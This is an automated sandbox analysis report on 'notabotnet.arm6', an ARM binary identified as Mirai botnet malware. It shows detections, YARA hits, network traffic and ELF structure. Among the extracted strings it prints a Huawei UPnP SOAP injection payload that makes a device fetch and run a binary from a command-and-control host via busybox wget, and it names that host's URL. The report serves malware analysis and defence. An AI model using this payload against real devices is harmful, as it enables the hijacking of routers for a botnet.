Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
notabotnet.arm6

Overview

General Information

Sample Name:notabotnet.arm6
Analysis ID:679639
MD5:15b8885e01b36d260d68f181a8ad234b
SHA1:ce2cbb334f644c3f906921a84af315ef8bde768a
SHA256:4d2f8ca7808ac88293ea0bbf579e7dc3d2dbe70971a18701f7d58bf44d4c72a6
Tags:Mirai
Infos:

Detection

Mirai
Score:56
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Exit code information suggests that the sample terminated abnormally, try to lookup the sample's target architecture.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:679639
Start date and time: 06/08/202208:00:212022-08-06 08:00:21 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 54s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:notabotnet.arm6
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal56.troj.linARM6@0/0@0/0
Command:/tmp/notabotnet.arm6
PID:6231
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • notabotnet.arm6 (PID: 6231, Parent: 6123, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/notabotnet.arm6
  • cleanup
SourceRuleDescriptionAuthorStrings
notabotnet.arm6SUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x15638:$xo1: Dfs`eeh&<'9
  • 0x156b0:$xo1: Dfs`eeh&<'9
  • 0x15724:$xo1: Dfs`eeh&<'9
  • 0x15794:$xo1: Dfs`eeh&<'9
  • 0x157e0:$xo1: Dfs`eeh&<'9
notabotnet.arm6JoeSecurity_Mirai_6Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6231.1.00007f067c017000.00007f067c02d000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x15638:$xo1: Dfs`eeh&<'9
    • 0x156b0:$xo1: Dfs`eeh&<'9
    • 0x15724:$xo1: Dfs`eeh&<'9
    • 0x15794:$xo1: Dfs`eeh&<'9
    • 0x157e0:$xo1: Dfs`eeh&<'9
    6231.1.00007f067c017000.00007f067c02d000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      Process Memory Space: notabotnet.arm6 PID: 6231JoeSecurity_Mirai_6Yara detected MiraiJoe Security
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: notabotnet.arm6Virustotal: Detection: 50%Perma Link
        Source: notabotnet.arm6ReversingLabs: Detection: 58%
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 60.20.44.123
        Source: unknownTCP traffic detected without corresponding DNS query: 60.20.44.123
        Source: unknownTCP traffic detected without corresponding DNS query: 60.20.44.123
        Source: unknownTCP traffic detected without corresponding DNS query: 60.20.44.123
        Source: unknownTCP traffic detected without corresponding DNS query: 60.20.44.123
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 60.20.44.123
        Source: unknownTCP traffic detected without corresponding DNS query: 60.20.44.123
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 173.237.89.123
        Source: notabotnet.arm6String found in binary or memory: http://cnc.fearfulcats.tk/notabotnet/notabotnet.arm7
        Source: notabotnet.arm6String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: notabotnet.arm6String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: notabotnet.arm6, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
        Source: 6231.1.00007f067c017000.00007f067c02d000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g cnc.fearfulcats.tk -l /tmp/binary -r /notabotnet/notabotnet.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: classification engineClassification label: mal56.troj.linARM6@0/0@0/0
        Source: /tmp/notabotnet.arm6 (PID: 6231)Queries kernel information via 'uname': Jump to behavior
        Source: notabotnet.arm6, 6231.1.000055cc8d4a9000.000055cc8d5d7000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
        Source: notabotnet.arm6, 6231.1.000055cc8d4a9000.000055cc8d5d7000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: notabotnet.arm6, 6231.1.00007ffe04d4e000.00007ffe04d6f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
        Source: notabotnet.arm6, 6231.1.00007ffe04d4e000.00007ffe04d6f000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
        Source: notabotnet.arm6, 6231.1.00007ffe04d4e000.00007ffe04d6f000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/notabotnet.arm6SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/notabotnet.arm6

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: notabotnet.arm6, type: SAMPLE
        Source: Yara matchFile source: 6231.1.00007f067c017000.00007f067c02d000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: notabotnet.arm6 PID: 6231, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: notabotnet.arm6, type: SAMPLE
        Source: Yara matchFile source: 6231.1.00007f067c017000.00007f067c02d000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: notabotnet.arm6 PID: 6231, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        SourceDetectionScannerLabelLink
        notabotnet.arm651%VirustotalBrowse
        notabotnet.arm659%ReversingLabsLinux.Trojan.Mirai
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://cnc.fearfulcats.tk/notabotnet/notabotnet.arm79%VirustotalBrowse
        http://cnc.fearfulcats.tk/notabotnet/notabotnet.arm7100%Avira URL Cloudmalware
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://cnc.fearfulcats.tk/notabotnet/notabotnet.arm7notabotnet.arm6true
        • 9%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://schemas.xmlsoap.org/soap/encoding/notabotnet.arm6false
          high
          http://schemas.xmlsoap.org/soap/envelope/notabotnet.arm6false
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            173.237.89.123
            unknownUnited States
            19009ONECLEVELANDUSfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            60.20.44.123
            unknownChina
            4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            109.202.202.202j2574ewVDrGet hashmaliciousBrowse
              rrLYg2XVqcGet hashmaliciousBrowse
                6ctS10KOUwGet hashmaliciousBrowse
                  vY0pwbEjCyGet hashmaliciousBrowse
                    TiC331oLqlGet hashmaliciousBrowse
                      M6QF2iPEhYGet hashmaliciousBrowse
                        FLR8L1i57HGet hashmaliciousBrowse
                          S8IcY2CZlCGet hashmaliciousBrowse
                            SecuriteInfo.com.Linux.EbolaChan.23.16769.24974Get hashmaliciousBrowse
                              6dvrI3JuMDGet hashmaliciousBrowse
                                cZ5vBTYHZ5Get hashmaliciousBrowse
                                  NBizk4vkbqGet hashmaliciousBrowse
                                    GOm8HhVLLpGet hashmaliciousBrowse
                                      10mx8Hm6iUGet hashmaliciousBrowse
                                        bNvYxLYZESGet hashmaliciousBrowse
                                          BpP29cFe2fGet hashmaliciousBrowse
                                            DOh3a8QOpaGet hashmaliciousBrowse
                                              a-r.m-6.SNOOPYGet hashmaliciousBrowse
                                                x-8.6-.SNOOPYGet hashmaliciousBrowse
                                                  x-3.2-.SNOOPYGet hashmaliciousBrowse
                                                    91.189.91.43j2574ewVDrGet hashmaliciousBrowse
                                                      rrLYg2XVqcGet hashmaliciousBrowse
                                                        6ctS10KOUwGet hashmaliciousBrowse
                                                          vY0pwbEjCyGet hashmaliciousBrowse
                                                            TiC331oLqlGet hashmaliciousBrowse
                                                              M6QF2iPEhYGet hashmaliciousBrowse
                                                                FLR8L1i57HGet hashmaliciousBrowse
                                                                  S8IcY2CZlCGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Linux.EbolaChan.23.16769.24974Get hashmaliciousBrowse
                                                                      6dvrI3JuMDGet hashmaliciousBrowse
                                                                        cZ5vBTYHZ5Get hashmaliciousBrowse
                                                                          NBizk4vkbqGet hashmaliciousBrowse
                                                                            GOm8HhVLLpGet hashmaliciousBrowse
                                                                              10mx8Hm6iUGet hashmaliciousBrowse
                                                                                bNvYxLYZESGet hashmaliciousBrowse
                                                                                  BpP29cFe2fGet hashmaliciousBrowse
                                                                                    DOh3a8QOpaGet hashmaliciousBrowse
                                                                                      a-r.m-6.SNOOPYGet hashmaliciousBrowse
                                                                                        x-8.6-.SNOOPYGet hashmaliciousBrowse
                                                                                          x-3.2-.SNOOPYGet hashmaliciousBrowse
                                                                                            91.189.91.42j2574ewVDrGet hashmaliciousBrowse
                                                                                              rrLYg2XVqcGet hashmaliciousBrowse
                                                                                                6ctS10KOUwGet hashmaliciousBrowse
                                                                                                  vY0pwbEjCyGet hashmaliciousBrowse
                                                                                                    TiC331oLqlGet hashmaliciousBrowse
                                                                                                      M6QF2iPEhYGet hashmaliciousBrowse
                                                                                                        FLR8L1i57HGet hashmaliciousBrowse
                                                                                                          S8IcY2CZlCGet hashmaliciousBrowse
                                                                                                            SecuriteInfo.com.Linux.EbolaChan.23.16769.24974Get hashmaliciousBrowse
                                                                                                              6dvrI3JuMDGet hashmaliciousBrowse
                                                                                                                cZ5vBTYHZ5Get hashmaliciousBrowse
                                                                                                                  NBizk4vkbqGet hashmaliciousBrowse
                                                                                                                    GOm8HhVLLpGet hashmaliciousBrowse
                                                                                                                      10mx8Hm6iUGet hashmaliciousBrowse
                                                                                                                        bNvYxLYZESGet hashmaliciousBrowse
                                                                                                                          BpP29cFe2fGet hashmaliciousBrowse
                                                                                                                            DOh3a8QOpaGet hashmaliciousBrowse
                                                                                                                              a-r.m-6.SNOOPYGet hashmaliciousBrowse
                                                                                                                                x-8.6-.SNOOPYGet hashmaliciousBrowse
                                                                                                                                  x-3.2-.SNOOPYGet hashmaliciousBrowse
                                                                                                                                    No context
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    CANONICAL-ASGBj2574ewVDrGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    rrLYg2XVqcGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    6ctS10KOUwGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    vY0pwbEjCyGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    TiC331oLqlGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    M6QF2iPEhYGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    FLR8L1i57HGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    S8IcY2CZlCGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    SecuriteInfo.com.Linux.EbolaChan.23.16769.24974Get hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    6dvrI3JuMDGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    cZ5vBTYHZ5Get hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    NBizk4vkbqGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    GOm8HhVLLpGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    10mx8Hm6iUGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    bNvYxLYZESGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    BpP29cFe2fGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    DOh3a8QOpaGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    a-r.m-6.SNOOPYGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    x-8.6-.SNOOPYGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    x-3.2-.SNOOPYGet hashmaliciousBrowse
                                                                                                                                    • 91.189.91.42
                                                                                                                                    INIT7CHj2574ewVDrGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    rrLYg2XVqcGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    6ctS10KOUwGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    vY0pwbEjCyGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    TiC331oLqlGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    M6QF2iPEhYGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    FLR8L1i57HGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    S8IcY2CZlCGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    SecuriteInfo.com.Linux.EbolaChan.23.16769.24974Get hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    6dvrI3JuMDGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    cZ5vBTYHZ5Get hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    NBizk4vkbqGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    GOm8HhVLLpGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    10mx8Hm6iUGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    bNvYxLYZESGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    BpP29cFe2fGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    DOh3a8QOpaGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    a-r.m-6.SNOOPYGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    x-8.6-.SNOOPYGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    x-3.2-.SNOOPYGet hashmaliciousBrowse
                                                                                                                                    • 109.202.202.202
                                                                                                                                    ONECLEVELANDUSHR098Ebr1z.dllGet hashmaliciousBrowse
                                                                                                                                    • 72.2.64.163
                                                                                                                                    7myCS48Y2sGet hashmaliciousBrowse
                                                                                                                                    • 72.2.94.255
                                                                                                                                    jKira.arm7Get hashmaliciousBrowse
                                                                                                                                    • 72.2.91.112
                                                                                                                                    njC7yGDPxFGet hashmaliciousBrowse
                                                                                                                                    • 207.89.32.163
                                                                                                                                    fbot.mipselGet hashmaliciousBrowse
                                                                                                                                    • 204.130.188.62
                                                                                                                                    sora.armGet hashmaliciousBrowse
                                                                                                                                    • 72.2.94.213
                                                                                                                                    48bNKDBCBTod.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.248.40.179
                                                                                                                                    No context
                                                                                                                                    No context
                                                                                                                                    No created / dropped files found
                                                                                                                                    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                                    Entropy (8bit):6.082599753088192
                                                                                                                                    TrID:
                                                                                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                                    File name:notabotnet.arm6
                                                                                                                                    File size:91440
                                                                                                                                    MD5:15b8885e01b36d260d68f181a8ad234b
                                                                                                                                    SHA1:ce2cbb334f644c3f906921a84af315ef8bde768a
                                                                                                                                    SHA256:4d2f8ca7808ac88293ea0bbf579e7dc3d2dbe70971a18701f7d58bf44d4c72a6
                                                                                                                                    SHA512:9170825222786ea370304daf7a4d54e50f45e0a3553f0250e748812d8cb9b2736fdc24aa368da243b6fe16faafacc9e28e6cf8da66956e643a8a5dff6e6ddafc
                                                                                                                                    SSDEEP:1536:Z2NnKIfKjRGp7qs9GwHlGM0ZCuyj7wFWJ70q9dyCgIEHzUIhiqmk7myifIv:ZNIiVIqkGgdyCujGYq9kC0mk7myi
                                                                                                                                    TLSH:459319C6BC409E14C6C616B7FA2F108E3302579DE2DEB352CD155F747BCA82B0E2A55A
                                                                                                                                    File Content Preview:.ELF..............(.....T...4...Pc......4. ...(..................... \.. \...............`...`...`..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..b.......`....-.@0....S

                                                                                                                                    ELF header

                                                                                                                                    Class:ELF32
                                                                                                                                    Data:2's complement, little endian
                                                                                                                                    Version:1 (current)
                                                                                                                                    Machine:ARM
                                                                                                                                    Version Number:0x1
                                                                                                                                    Type:EXEC (Executable file)
                                                                                                                                    OS/ABI:UNIX - System V
                                                                                                                                    ABI Version:0
                                                                                                                                    Entry Point Address:0x8154
                                                                                                                                    Flags:0x4000002
                                                                                                                                    ELF Header Size:52
                                                                                                                                    Program Header Offset:52
                                                                                                                                    Program Header Size:32
                                                                                                                                    Number of Program Headers:3
                                                                                                                                    Section Header Offset:90960
                                                                                                                                    Section Header Size:40
                                                                                                                                    Number of Section Headers:12
                                                                                                                                    Header String Table Index:11
                                                                                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                                    NULL0x00x00x00x00x0000
                                                                                                                                    .initPROGBITS0x80940x940x100x00x6AX004
                                                                                                                                    .textPROGBITS0x80b00xb00x141ac0x00x6AX0016
                                                                                                                                    .finiPROGBITS0x1c25c0x1425c0x100x00x6AX004
                                                                                                                                    .rodataPROGBITS0x1c26c0x1426c0x19b40x00x2A004
                                                                                                                                    .init_arrayINIT_ARRAY0x260040x160080x40x00x3WA004
                                                                                                                                    .fini_arrayFINI_ARRAY0x260080x1600c0x40x00x3WA004
                                                                                                                                    .gotPROGBITS0x260100x160140x740x40x3WA004
                                                                                                                                    .dataPROGBITS0x260840x160880x2580x00x3WA004
                                                                                                                                    .bssNOBITS0x262dc0x162e00x27c40x00x3WA004
                                                                                                                                    .ARM.attributesARM_ATTRIBUTES0x00x162e00x100x00x0001
                                                                                                                                    .shstrtabSTRTAB0x00x162f00x5d0x00x0001
                                                                                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                    LOAD0x00x80000x80000x15c200x15c206.13930x5R E0x8000.init .text .fini .rodata
                                                                                                                                    LOAD0x160040x260040x260000x2dc0xaa9c3.65980x6RW 0x8000.init_array .fini_array .got .data .bss
                                                                                                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Aug 6, 2022 08:01:07.757829905 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                    Aug 6, 2022 08:01:08.525773048 CEST4251680192.168.2.23109.202.202.202
                                                                                                                                    Aug 6, 2022 08:01:18.888679981 CEST233666260.20.44.123192.168.2.23
                                                                                                                                    Aug 6, 2022 08:01:18.888900042 CEST3666223192.168.2.2360.20.44.123
                                                                                                                                    Aug 6, 2022 08:01:19.317980051 CEST233666260.20.44.123192.168.2.23
                                                                                                                                    Aug 6, 2022 08:01:19.318176985 CEST3666223192.168.2.2360.20.44.123
                                                                                                                                    Aug 6, 2022 08:01:19.748023033 CEST233666260.20.44.123192.168.2.23
                                                                                                                                    Aug 6, 2022 08:01:19.748327971 CEST3666223192.168.2.2360.20.44.123
                                                                                                                                    Aug 6, 2022 08:01:20.607984066 CEST233666260.20.44.123192.168.2.23
                                                                                                                                    Aug 6, 2022 08:01:20.608320951 CEST3666223192.168.2.2360.20.44.123
                                                                                                                                    Aug 6, 2022 08:01:22.328018904 CEST233666260.20.44.123192.168.2.23
                                                                                                                                    Aug 6, 2022 08:01:22.328308105 CEST3666223192.168.2.2360.20.44.123
                                                                                                                                    Aug 6, 2022 08:01:22.861255884 CEST43928443192.168.2.2391.189.91.42
                                                                                                                                    Aug 6, 2022 08:01:25.778014898 CEST233666260.20.44.123192.168.2.23
                                                                                                                                    Aug 6, 2022 08:01:25.778249979 CEST3666223192.168.2.2360.20.44.123
                                                                                                                                    Aug 6, 2022 08:01:32.677936077 CEST233666260.20.44.123192.168.2.23
                                                                                                                                    Aug 6, 2022 08:01:32.678184032 CEST3666223192.168.2.2360.20.44.123
                                                                                                                                    Aug 6, 2022 08:01:35.148530006 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                    Aug 6, 2022 08:01:39.244287968 CEST4251680192.168.2.23109.202.202.202
                                                                                                                                    Aug 6, 2022 08:02:03.818905115 CEST43928443192.168.2.2391.189.91.42
                                                                                                                                    Aug 6, 2022 08:02:49.416522980 CEST2347506173.237.89.123192.168.2.23
                                                                                                                                    Aug 6, 2022 08:02:49.416979074 CEST4750623192.168.2.23173.237.89.123

                                                                                                                                    System Behavior

                                                                                                                                    Start time:08:01:04
                                                                                                                                    Start date:06/08/2022
                                                                                                                                    Path:/tmp/notabotnet.arm6
                                                                                                                                    Arguments:/tmp/notabotnet.arm6
                                                                                                                                    File size:4956856 bytes
                                                                                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1